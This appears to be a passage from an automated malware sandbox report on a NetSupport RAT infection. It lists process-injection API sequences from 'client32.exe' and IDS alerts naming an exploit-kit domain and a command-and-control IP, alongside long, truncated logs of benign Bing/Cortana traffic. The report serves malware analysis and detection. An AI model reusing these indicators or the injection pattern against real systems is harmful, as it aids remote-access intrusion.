                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,37_2_1106A0A0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,37_2_111266E0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,37_2_1110AFD0
                                  Source: chrome.exeMemory has grown: Private usage: 18MB later: 61MB

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2061385 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (islonline .org) : 192.168.2.17:61783 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2061385 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (islonline .org) : 192.168.2.17:55881 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2061388 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (islonline .org) : 192.168.2.17:49733 -> 23.23.49.179:443
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.17:49796 -> 94.158.245.131:443
                                  Source: Network trafficSuricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.17:49796 -> 94.158.245.131:443
                                  Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=k&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=c16bccd06c08419ab579eb9d479800f7 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-s
                                  Source: global trafficHTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ke&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=765b10655e7e40cbb2ceb3b8d696ff0e HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-
                                  Source: global trafficHTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=key&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=e536722ae7aa4c4fabfce29204700ecd HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
                                  Source: global trafficHTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
                                  Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
                                  Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=65dc22f5bae44905b431c10cc183a3ed HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=0638cfbb5a9041079ce3b71fd1168ee9 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
                                  Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding:
                                  Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding:
                                  Source: global trafficHTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=5cb3c615592b43b52b10d4befb60d1c1&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22s-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:864,%22T%22:1},{%22RequestID%22:%22s-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:169,%22T%22:1},{%22RequestID%22:%223e8c2c37b90301f8e8025e3b8e4361cf%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:61998,%22T%22:128,%22Rip%22:%22%20191.101.61.0%22,%22Ep%22:%22%20fra21prdapp03%22,%22Mn%22:%22%20fra21app033%22},{%22RequestID%22:%223e8c2c37b90301f8e8025e3b8e4361cf%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:312,%22T%22:128,%22Rip%22:%22%20191.101.61.0%22,%22Ep%22:%22%20fra21prdapp03%22,%22Mn%22:%22%20fra21app033%22},{%22RequestID%22:%2219f550f74e18dcc29dd96863598fc7e4%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:1699,%22T%22:128,%22Rip%22:%22%20191.101.61.0%22,%22Ep%22:%22%20akl02prdapp01%22,%22Mn%22:%22%20akl02app011%22},{%22RequestID%22:%2219f550f74e18dcc29dd96863598fc7e4%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:295,%22T%22:128,%22Rip%22:%22%20191.101.61.0%22,%22Ep%22:%22%20akl02prdapp01%22,%22Mn%22:%22%20akl02app011%22}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityu
                                  Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926382x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 9A34E62F5FF5404283834A63CEC5B725x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding:
                                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49795 -> 35.206.121.228:443
                                  Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                                  Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                                  Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
